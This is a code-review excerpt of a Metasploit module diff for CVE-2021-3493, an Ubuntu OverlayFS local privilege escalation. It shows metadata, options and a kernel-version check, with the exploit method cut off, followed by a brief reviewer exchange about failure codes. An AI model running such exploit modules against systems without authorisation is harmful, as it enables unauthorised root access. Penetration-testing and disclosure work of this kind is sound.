modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

```diff
@@ -0,0 +1,139 @@
+  Rank = GreatRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '2021 Ubuntu Overlayfs LPE',
+        'Description' => %q{
+          2021 Ubuntu Overlayfs LPE
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'ssd-disclosure',
+          'bwatters-r7' # Aka @tychos_moose, Metasploit Module
+        ],
+        'DisclosureDate' => '2021-04-12',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2021-3493' ],
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/' ],
+          [ 'URL', 'https://github.com/briskets/CVE-2021-3493' ]
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ ],
+          'SideEffects' => [ ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def check
+    arch = kernel_hardware
+
+    unless arch.include?('x86_64')
+      return CheckCode::Safe("System architecture #{arch} is not supported")
+    end
+
+    release = kernel_release
+    version = kernel_version
+
+    # If the target is Ubuntu...
+    unless version =~ /[uU]buntu/
+      return CheckCode::Safe('Target is not Ubuntu!')
+    end
+
+    version_array = release.split('-')
+    if version_array.length < 2
+      fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')
+    end
+    vprint_status("Version array: #{version_array}")
+    major_version = Rex::Version.new(version_array[0])
+    vprint_status("major_version: #{major_version}")
+    minor_version = version_array[1]
+    vprint_status("minor_version: #{minor_version}")
+    lower_bound_version = Rex::Version.new(3.13)
+    upper_bound_version = Rex::Version.new(5.14)
+    if major_version > upper_bound_version || major_version < lower_bound_version
+      return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}")
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    if is_root? && !datastore['ForceExploit']
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
```

Comment:
`Failure::None` should be used...
> for example a privilege escalation is already in an elevated context)

[Source](https://github.com/rapid7/metasploit-framework/wiki/Handling-Module-Failures-with-%60fail_with%60#comprehensive-list-of-fail_with-parameters)

Reply:
Done